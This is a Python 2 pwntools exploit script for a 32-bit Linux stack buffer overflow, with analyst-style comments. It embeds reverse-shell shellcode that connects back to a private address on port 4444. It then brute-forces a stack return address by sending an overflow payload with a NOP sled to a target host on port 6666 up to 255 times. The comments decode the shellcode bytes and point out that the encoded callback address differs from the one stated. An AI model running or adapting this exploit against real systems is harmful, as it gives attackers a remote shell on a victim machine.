from pwn import *
import sys
# gdb-peda
# shellcode generate x86/linux 4444 192.168.3.136
# Connect-back (reverse shell) shellcode for 32-bit Linux.  The comment above
# says it was generated for 192.168.3.136:4444.  The bytes below carry the
# port as \x66\x68\x11\x5c (0x115c = 4444, matching the comment) and an
# address as \x68\xc0\xa8\x03\x80, which reads as 192.168.3.128 --
# NOTE(review): that differs from the 192.168.3.136 in the comment, so an
# analyst should take the callback indicator from the bytes, not the comment.
# The tail pushes the ASCII "//sh" and "/bin" before the final int 0x80.
shellcode = (
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x03\x80\x66\x68"
"\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80"
)
# Brute-force loop over the low byte of a little-endian stack address
# 0xbffffbXX: every iteration opens a fresh TCP connection to
# 192.168.3.137:6666, sends one payload and closes the socket -- up to 255
# connections in quick succession, which is the observable network pattern.
# Python 2 syntax (print statement, str payloads); does not run unchanged on
# Python 3.
for x in range(1, 0xff+1):
    io = remote("192.168.3.137", 6666)
    # Guessed address: x as the low byte followed by \xfb\xff\xbf
    # (little-endian 0xbffffbXX).
    addr = chr(x)+"\xfb\xff\xbf"
    # 44 filler bytes -- presumably the distance to the saved return address
    # in the target; not derivable from this file.
    payload = "A"*44
    payload += addr
    # Four NOP bytes in front of the shellcode.
    payload += "\x90"*4+shellcode
    # Progress output: the guessed address, unpacked as a 32-bit LE integer.
    print "addr : " + str(hex(u32(addr)))
    io.sendline(payload)
    # Not wrapped in try/finally: if remote() or sendline() raises, the loop
    # stops and the open socket is left to the interpreter to reclaim.
    io.close()